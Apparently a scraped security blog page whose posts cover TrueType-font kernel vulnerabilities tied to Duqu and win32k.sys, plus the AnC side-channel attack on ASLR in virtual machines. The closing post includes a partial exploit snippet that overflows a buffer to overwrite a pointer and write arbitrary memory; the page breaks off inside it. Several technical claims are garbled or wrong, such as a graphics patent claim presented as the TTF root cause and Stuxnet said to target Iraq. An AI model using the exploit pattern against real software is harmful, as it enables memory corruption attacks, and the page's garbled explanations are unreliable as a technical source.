CVE-2017-2360 9.3 DoS Exec Code 2017-02-20 2017-02-22
Andriod OS
CVE-2017-0405 9.3 Remote code execution vulnerability in Surfaceflinger 2017 2017 Feb
CVE-2017-0406, CVE-2017-0407 9.3 Remote code execution vulnerability in Mediaserver 2017 2017 Feb

Summary:

If people tell you that a new mobile device is excellent, less vulnerabilities found. It is a perfect design. Even though he is the best at this moment. But believed that it is hard to maintain the glory in the long run. Why, because of today business on demand business strategy. If you heard that Android operating not secure anymore, but it is properly not.

 

 

System

Truetype font + code = fileless malware

240 Comments

Security services provider alert the IT world that malware might infiltrate to their infrastructure facilities. However their cyber defense mechanism looks fall into asleep. So strange? Over 140 enterprises in 40 countries affected. Dubbed that fileless or invisible cyber attack common are in three types. They are memory resident, Rootkits and Windows registry. Refer to anti-virus expert interpretation, It evades detection by reducing or eliminating the storage of any binaries on disk and instead hides its code in the registry of a compromised host. The naming convention base on above criteria. Can you still remember W32,Duqu malware? He is the descendants of Stuxnet. We all knew Stuxnet is the famous malware which responsible for causing substantial damage to Iran’s nuclear program identify in 2010.  Regarding to the technical articles, Stuxnet and W32.Duqu specification equivalent  fileless malware algorithm.  Coincidentally, the fileless malware target Windows OS . But this matter would like to bring to our attention is the infectious media. Nowadays enterprise company installed advanced cyber defense facilities.  The detective control can effectively quarantine the malicious network activities once infected device going to download the payload file. Such malware download action nearly 99% is a execution file. And therefore no difficulties on malware detector on this direct approach attack today.

Refer to analysis report, W32.Duqu make use of true type font as a infection media. The first time I heard this infection technique looks surprise me. We understand now that a true type font can contain a malware then directly exploits vulnerabilities in the Windows Kernel. The attack method was that crafted True Type Font (TTF) files, such TTF file allowed the malware to escape a user-mode sandboxed environment implemented by the Microsoft Word process and compromise the host. Since nobody else discover more details information on CVE-2011-3402 till exploration kit open the secret in Oct 2012.

Security Experts found win32k.sys truly a instigator. They dig out that Microsoft products most likely is the major target of such attack.  From logic point of view, the users coverage of Microsoft is the largest in the world. Since the objective of Stuxnet malware outbreak targets Iraq nuclear facilities Microsoft operating system workstation.  The security expert point out the design weakness of win32k.sys. Details is shown as below:

  • Windows executes true type font programs
  • Rendering bitmaps
  • Win32K operate in Kernel area (Ring 0)

Remark: A kernel-mode object database (part of win32k.sys) that marshals commands from the application to the composition engine.

As time goes by,  Google Project Zero summarizes all the details and related information.

https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html

https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

https://googleprojectzero.blogspot.de/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

Vulnerabilities relate to win32k.sys and True type font looks like a never ending story. See below table break down list for reference.

Remark: TrueType fonts (made by Microsoft) live in your windows fonts folder.

The BLEND vulnerability (CVE-2015-0093, CVE-2015-3052)

Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

  •  CVE-2016-3029 confirm that vulnerability allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka “True Type Font Parsing Information Disclosure Vulnerability.”  The ASLR (Address space layout randomization) is the major protection feature on virtual machine especially VMware. In the sense that the specify vulnerability like flooding. It now effect virtual machine environment.
  • True Type Font Parsing Elevation of Privilege Vulnerability – CVE-2016-7182. The vulnerability is in the cjComputeGLYPHSET_MSFT_GENERAL function of the Win32k.sys system module. This is the design limitation due to improper processing of crafted TrueType fonts (TTF). The vulnerability is due to improper handling of objects within memory.

 

We did analysis tones of documents of vulnerabilities on True type font (TTF) so far. May be you have question? What is the overall impact of TTF vulnerability today? Does all the vulnerabilities has been fixed? We are all on virtual machine environment. Is there any impact on virtual machines once a single VM compartment compromised?

  1. What is the overall impact of TTF vulnerability today?

It looks that true type font design limitation integrate with Graphics display mechanism on computer hardware causes never ending vulnerabilities. See below graphic state summary table, it shown that a auto flip mechanism will be apply to graphics state variable.

You can easy to find hints in below 2 statements to exploit the usage of memory design.  Security Expert (FireEye) believed that this is one of the root causes.
The graphics controller as claimed in claim 7, wherein said auto-flip mechanism comprises:
  • a bank of shift registers arranged to synchronize the video capture parameters from video capture engine and temporarily store those parameters; and
  • a control block arranged to control proper “flipping” events based on the sequence of input video capture parameters from the video capture engine registered in the shift registers, said control block comprising a Truth Table for maintaining predetermined display setting values for different auto-flip operations based on the sequence of the video capture parameters from the video capture engine and overlay control signals from the video overlay engine.

It looks that above issues are the fundamental problem of hardware display architecture. Since memory address of temporarily store memory no bounds checking. And therefore malware can make use of this vulnerability. So the impact of TTF (Ture type font) vulnerabilities are still inherent today.

2. Does all the vulnerabilities has been fixed?

Refer to above information details, it looks that it is hard to draw into conclusion today!

3. We are all on virtual machine environment. Is there any impact on virtual machines once a single VM compartment compromised?

CVE-2016-3029 confirm that vulnerability allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka “True Type Font Parsing Information Disclosure Vulnerability.”  The ASLR (Address space layout randomization) is the major protection feature on virtual machine especially VMware. In the sense that the specify vulnerability like flooding. It now effect virtual machine environment.

Predictions:

I strongly believed that hackers or governance enforcement team will relies on these vulnerabilities to develop different malware to satisfy their objective. Stay tune!

 

Comments:

Some test I didn’t complete yet. If you are interested of this topic, you can drill down a little bit more. The related hints might found on visual studio documents. Related hints displayed as below:

Refer to visual studio documentation, The ushort keyword indicates an integral data type that stores values according to the size and range (0 to 65,535)……….

 

 

 

 

 

 

Application Development, System

He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

255 Comments

 

 

 

The trend in IT world running into virtual world nowadays. Even though your mobile phone operation system is run on top of virtual machine. The memory resources utilization from tradition static to dynamic since virtual machine architecture founded. Security experts worries about infiltration of malware on virtual machine. A mitigation step introduce on VMware since 2014. The system designer conducted a technology alleged address space layout randomization. As a result it avoid malware implant to kernel since no living place for the malware alive (see below – a statement on technical article point out that how ASLR bring in the value)

The VMware ESXi kernel uses an address space layout randomization (ASLR) methodology to provide random and unpredictable addresses for user-mode applications, drivers, libraries and other executable components. This is a significant security benefit because of the way ASLR thwarts malware looking to take advantage of memory-based exploits. The malware would not have a known address to use as a vector for the exploit because of the randomization.

As times goes by, ASLR not even is the assistance of virtual machine designer. On the other hand, he will become a killer to kill his master. But this fact is not a news today. Regarding to the technology expertise experimental studies, it is possible to execute a attack on kernel side through malicious Java application. The method is a kind of side-channel attack (side-channel attacks) and based on the definition of indirect addresses to which had previously been handling when traversing page tables memory processor unit MMU (Memory Management Unit) in the translation of virtual memory addresses to physical memory addresses. Since cache CPU general and it is recognized as an active application or activity the MMU, then by evaluating differences in data access time before and after resetting the cache (the attack variety “EVICT + TIME”) can with high probability to choose the address and able to detect the locations since it is under the operation of memory management unit.

By breaking ASLR, an attacker will know where code executes, and prepare an attack that targets the same area of the memory, stealing sensitive information stored in the computer’s memory.

The vulnerability channel found on web browser announced by Professor of Computer Science at Cornell Tech on Jan 2016.

When attacking browsers, may be able to insert arbitrary objects into the victim’s heap. Let’s focus on web browser design fundamental.

Web applications communicate with each other through system calls to the browser kernel. As we know, web applications exist in separate processes owned by the browser kernel, they are prohibited from communicating with each other, except through the browser kernel.

 

However Plugins are less reliable than browsers.

However Plugins are less reliable than browsers

 

As a matter of fact, Java script is the helper of ASLR vulnerability. Sounds like java-script is an accomplice. The murderer is plug in application.

But in which situation virtual machine will be compromise of this vulnerability?

From technical point of view hacker engage a cyber attack targets workplace on memory area we understood that it is a malware form style attack.  As we know, AMD architecture define a feature named SVM instruction set.  AMD virtualization technology, codenamed “Pacifica,” introduces several new instructions and modifies several existing instructions to facilitate the implementation of VMM systems.
The SVM instruction set includes instructions to:

Start execution of a guest (VMRUN)
Save and restore subsets of processor state (VMSAVE,VMLOAD)
Allow guests to explicitly communicate with the VMM (VMMCALL)
Set and clear the global interrupt flag (STGI, CLGI)
Invalidate TLB entries in a specified ASID (INVLPGA)
Read and write CR8 in all processor modes
Secure init and control transfer with attestation (SKINIT)

Remark: Fundamentally, VMMs (Hypervisor) work by intercepting and emulating in a safe manner sensitive operations in the guest (such as changing the page tables, which could give a guest access to memory it is not allowed to access).

 

As such,  you are more free to run on memory address space once AMD-V is enabled in the BIOS (or by the host OS).

Remark: (VERR_SVM_ENABLED)

Below confirmed CVEs looks headaches to virtual machine core designers (VMWARE, VBOX, Hyper-V), right?

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

Since founded AnC attack (EVICT+TIME), it  can detect which locations in the page table pages are accessed during a page table walk performed by the MMU.  In the sense that it such a way broken the ASLR feature on virtual machine. The objective of ASLR mainly avoid malware infection on virtual machine. What scenario we can foreseen tomorrow!

Sample: Java code with execute arbitrary memory write

// prepare buffer with address we want to write to
ptrBuf = ""
// fill buffer: length = relative ptr address - buffer start + ptr offset
while (ptrBuf.length < (0x????? - 0x9????? + 0xC)){ptrBuf += "A"}
ptrBuf += addr

// overflow buffer and overwrite the pointer value after buffer
obj.SetText(ptrBuf,0,0)

// use overwritten pointer to conduct memory write of 4 bytes
obj.SetFontName("\xbe\xba\xfe\xca") 

// WHAT TO WRITE
alert("Check after write:0x???????? + 0x?